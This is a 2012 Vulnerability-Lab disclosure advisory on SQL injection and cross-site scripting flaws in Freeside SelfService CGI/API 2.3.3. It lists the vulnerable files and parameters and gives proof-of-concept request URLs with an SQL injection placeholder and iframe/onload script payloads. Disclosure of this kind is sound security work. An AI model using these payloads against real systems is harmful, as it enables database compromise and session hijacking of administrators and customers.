247 lines
9 KiB
Text
Executable file
247 lines
9 KiB
Text
Executable file
Title:
|
|
======
|
|
Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2012-06-14
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=614
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
614
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
6.5
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
Billing, ticketing, reporting and configuration for employees and resellers The majority of Freeside s
|
|
functionality is accessed from here. The back office interface includes searching and viewing of customers,
|
|
invoices, trouble tickets and services, as well as reporting, configuration, per-user access control,
|
|
resellser virtualization and more.
|
|
|
|
(Copy of the Vendor Homepage: http://freeside.biz/freeside )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Freesides SelfService CGI|API v2.3.3 git.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2012-06-14: Public or Non-Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Affected Products:
|
|
==================
|
|
Freeside
|
|
Product: SelfService CGI|API v2.3.3
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
Details:
|
|
========
|
|
1.1
|
|
Multiple SQL Injection vulnerabilities are detected in Freesides SelfService CGI|API v2.3.3.
|
|
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own
|
|
sql commands on the affected application dbms without user inter action. The vulnerability is located in the
|
|
selfservice.cgi and the bound parameters action & svcnum. Successful exploitation of the vulnerability
|
|
results in dbms & application compromise.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] View my usage - Service usage details
|
|
|
|
Vulnerable File(s):
|
|
[+] selfservice.cgi
|
|
|
|
Vulnerable File(s):
|
|
[+] svcnum
|
|
[+] action
|
|
|
|
|
|
1.2
|
|
Multiple persistent input validation vulnerabilities are detected in Freesides SelfService CGI|API v2.3.3.
|
|
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
|
|
The persistent vulnerabilities are located in the cust_main.cgi, part_pkg.cgi, part_event.html or part_device.html
|
|
with the bound parameters company address, package comment, event- & device name. Exploitation requires low user
|
|
inter action & privileged application user account. Successful exploitation of the vulnerability can lead to
|
|
session hijacking (admin) or stable (persistent) context manipulation.
|
|
|
|
Vulnerable Files(s):
|
|
[+] ../edit/cust_main.cgi?426
|
|
[+] ../edit/part_pkg.cgi?4
|
|
[+] ../browse/part_event.html
|
|
[+] ../browse/part_device.html
|
|
|
|
Vulnerable Module(s):
|
|
[+] [Company] [Address]
|
|
[+] [Package] [Comment]
|
|
[+] [Event Name]
|
|
[+] [Device Name]
|
|
|
|
|
|
|
|
1.3
|
|
Multiple non persistent cross site scripting vulnerabilities are detected in Freesides SelfService CGI|API v2.3.3.
|
|
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
|
|
user inter action or local low privileged user account. The vulnerabilities are located in the selfservice.cgi file
|
|
with the vulnerable bound parameters pkg, pkgnum, beginning & end. Successful exploitation can result in account steal,
|
|
phishing & client-side content request manipulation.
|
|
|
|
Vulnerable Module(s):
|
|
[+] Change User Details
|
|
[+] Change Package
|
|
|
|
Vulnerable File(s):
|
|
[+] selfservice.cgi
|
|
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] pkg & pkgnum
|
|
[+] end & beginning
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
1.1
|
|
The sql injection vulnerability can be exploited by remote attackers without privileged user account or user inter action.
|
|
For demonstration or reproduce ...
|
|
|
|
PoC:
|
|
../selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details;svcnum=-1'[SQL-INJECTION];beginning=0;ending=0
|
|
../selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details[SQL-INJECTION];svcnum=X;beginning=0;ending=0
|
|
|
|
> "SELECT * FROM svc_acct WHERE svcnum = ?": LINE 1: SELECT * FROM svc_acct WHERE svcnum = $1
|
|
|
|
Note: First get a alive session, exchange it with the expired of the poc and then try to access the url to inject your sql commands.
|
|
|
|
|
|
1.2
|
|
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user inter action.
|
|
For demonstration or reproduce ...
|
|
|
|
Example:
|
|
The attacker create/edit an account and inject a malicious script code i.e., <iframe src=www.vuln-lab.com onload=alert("VL")></iframe>
|
|
in the vulnerable fields which are Company and Address. This bug is very dangerous because once the admin enters the admin area
|
|
he will see the page of users. The code that we injected will be executed out of the main page context of the admin.
|
|
|
|
|
|
Review: Payname
|
|
|
|
<font color="#FF0000">Illegal (name) (error code illegal_name) payname:
|
|
"><iframe src="selfservice.cgi-Dateien/a.xht" onload='alert("VL")' <<="" font="">
|
|
</FONT><BR><BR>
|
|
|
|
|
|
Review: Faxname
|
|
|
|
<font color="#FF0000">Illegal (phone) (error code illegal_phone) fax: "
|
|
><iframe src="selfservice2.cgi-Dateien/a.htm" onload='alert("VL")' <<="" font=""><
|
|
/FONT><BR><BR>
|
|
|
|
|
|
Review: Username
|
|
|
|
username) (2-32): "><iframe src="selfservice3.cgi-Dateien/a.htm" onload='alert("VL</FONT'>
|
|
</FONT><BR><BR>
|
|
<FORM
|
|
NAME="OrderPkgForm"
|
|
|
|
|
|
1.3
|
|
The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user
|
|
inter action & without local privileged user account. For demonstration or reproduce ...
|
|
|
|
PoC:
|
|
|
|
Module: Change User Details
|
|
|
|
http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details;svcnum=598;
|
|
beginning=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C;ending=%22
|
|
%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
|
|
|
|
|
|
Module: Change Package
|
|
|
|
http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=customer_change_pkg;
|
|
pkgnum=3646;pkg=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
|
|
|
|
|
|
http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=customer_change_pkg;
|
|
pkgnum=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C;pkg=Super%20Bundle%20200GB
|
|
|
|
|
|
Risk:
|
|
=====
|
|
1.1
|
|
The security risk of the sql injection vulnerability is estimated as high(-).
|
|
|
|
1.2
|
|
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).
|
|
|
|
1.3
|
|
The security risk of the non-persistent cross site scripting vulnerabilities are estimated as low(+).
|
|
|
|
|
|
Credits:
|
|
========
|
|
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [the StOrM) (storm@vulnerability-lab.com)
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com
|
|
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
|
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2012 Vulnerability-Lab
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY RESEARCH LABORATORY TEAM
|
|
Website: www.vulnerability-lab.com
|
|
Mail: research@vulnerability-lab.com
|
|
|
|
|